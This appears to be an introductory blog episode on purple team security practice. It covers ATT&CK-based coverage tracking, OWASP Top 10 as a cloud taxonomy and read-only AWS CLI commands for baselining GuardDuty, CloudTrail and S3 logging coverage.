Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.
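
The coverage number in that report is a set difference. A short sketch, assuming you keep one set of technique IDs relevant to your threat model and one set with verified detections; the coverage_report name and the TECH-nnn placeholder IDs are invented here and are not real ATT&CK identifiers.

```python
def coverage_report(relevant: set, verified: set) -> dict:
    """Compare verified detections against the relevant technique set."""
    covered = relevant & verified
    missing = relevant - verified
    percent = round(100 * len(covered) / len(relevant), 1) if relevant else 0.0
    return {
        "covered": len(covered),
        "total": len(relevant),
        "percent": percent,
        "missing": sorted(missing),
    }


# Placeholder IDs sized to match the example in the text: 47 of 112 covered.
relevant = {f"TECH-{i:03d}" for i in range(112)}
verified = {f"TECH-{i:03d}" for i in range(47)}

report = coverage_report(relevant, verified)
print(report["covered"], "of", report["total"], "covered,", len(report["missing"]), "not yet covered")
```

Intersecting with the relevant set first means a detection verified for a technique outside your threat model does not inflate the percentage.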


Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Server-Side Request Forgery (A10) is the request that hits the EC2 metadata endpoint.

The framing shifts. The categories don’t.


Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.


Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

# Count GuardDuty findings updated in the last 30 days, grouped by type
# (date -d is GNU date syntax)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)
aws guardduty list-findings \
  --detector-id "$DETECTOR_ID" \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 50 aws guardduty get-findings \
    --detector-id "$DETECTOR_ID" \
    --finding-ids | \
  jq -s '[.[].Findings[]] | group_by(.Type) | map({type: .[0].Type, count: length})'

# Check which CloudTrail trails exist and whether each one is actively logging
aws cloudtrail describe-trails \
  --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail,HomeRegion:HomeRegion}' --output table
aws cloudtrail describe-trails --query 'trailList[].TrailARN' --output text | \
  tr '\t' '\n' | \
  while read -r trail; do
    echo "$trail IsLogging=$(aws cloudtrail get-trail-status --name "$trail" --query 'IsLogging' --output text)"
  done

# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    # Empty output (or {}) means no logging configuration is set
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.


⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.

No documentation of the exercise environment state. If you tune a detection rule during an exercise and then a Terraform change overwrites the policy, you’ve lost the improvement. All detection changes from exercises go through version control immediately.


Quick Reference

Term                  Definition
--------------------  ---------------------------------------------------------------------------------
Purple team security  Practice of combined red/blue exercises where both teams improve detection together
MTTD                  Mean Time to Detect: the primary metric purple team exercises reduce
ATT&CK                MITRE framework mapping adversary techniques to data sources and detections
Red phase             Attacker perspective: simulate the technique with real commands
Blue phase            Defender perspective: what detection fires (or doesn’t)
Purple phase          The joint debrief and immediate detection tuning that makes both better
Detection baseline    Measured MTTD and technique coverage before the first exercise
OWASP Top 10          Threat taxonomy used in this series; applies to infrastructure, not just web apps

Key Takeaways

  • Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
  • The metric that matters is detection time per technique — not findings count
  • Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
  • MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
  • Every major cloud breach 2020–2025 maps to an OWASP category — those categories are the exercise backlog for any cloud-running organization
  • Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
  • Frequency of exercises is the primary driver of improvement — monthly beats annual by an order of magnitude

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.
